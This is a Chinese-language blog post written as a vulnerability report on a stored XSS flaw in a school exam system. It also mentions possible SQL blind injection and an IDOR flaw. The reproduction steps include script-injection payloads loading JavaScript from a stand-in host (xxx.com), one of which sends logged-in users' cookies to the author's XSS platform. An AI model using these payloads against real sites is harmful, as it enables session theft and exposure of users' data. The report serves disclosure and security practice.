引言~
最近学校由于方便我们学生的平时测试,所以新开了个考试系统,闲着无聊我就抱着玩的心态去测试了一波,由于本篇是用来锻炼我未来写报告的能力,所以格式会稍有变化
正文开始
标题:中国职工电化教育中心处考试系统处存在存储型xss
漏洞类别:事件型漏洞
厂商信息:中国职工电化教育中心
漏洞类型:xss(存储型)
漏洞等级:中危
漏洞简述:该页面在未检验数据是否存在XSS代码的情况下,便将其存入数据库。而且当下一次从数据库中获取该数据时程序也未对其进行过滤,页面会再次执行插入的恶意XSS代码,存储型XSS可以持续攻击用户。当目标用户进入含有xss恶意代码的页面时,存放在服务器的xss代码会从服务器解析之后加载出来。受害者只要访问插入xss攻击的页面,恶意脚本就能成功能够盗取当前登录用户的cookie,能造成用户敏感信息的泄露,可以配合csrf进行钓鱼攻击
复现步骤
一.往可能存在xss漏洞的输入框(25题笔记)构造以下代码进行验证:
"> <script src="http://xxx.com/myjs/alert.js"></script>
成功出现弹窗,初步判断存在xss漏洞
相关验证:在考试结果页面测试xss弹窗时,如果不点击确定在本页面弹出的xss窗口,那么与该页面关联的其它页面会出现卡死,导致与之关联的页面无法正常使用
关闭该页面退出重新进去后,发现页面重新xss弹窗,这时候可以确定,xss的类型为存储型xss
二.利用自建xss平台插入js验证代码来获取用户敏感信息
“> <script src="http://xxx.com/myjs/cs.js"></script>
插入攻击语句时,f12可以清楚的看到页面加载了我的xss平台
语句插入成功后,到xss平台观看效果
不难看出xss平台准确的列出登录用户的敏感信息,以及要请求访问的页面,因为是测试,所以我的xss代码没做过多的处理,如果有不法分子通过高明的手法构造xss语句来获取非法的用户敏感信息,后果将不堪设想!!!
关闭该页面退出重新进入
发现xss弹窗仍在
而且xss平台再次接收到了页面访问者的敏感信息
到此,漏洞复现完毕,可以确定页面存在存储型xss
补充:修改信息处也存在xss存储型漏洞,而且考试页面存在sql时间盲注,(由于是内网服务器,顺手测试并没有截到相关图片),但由于盲注太过麻烦,所以没有复现
除了xss漏洞外,
通过改URL地址栏可以查看不同用户信息,证明对用户的身份不做效验,有可能存在水平越权漏洞!!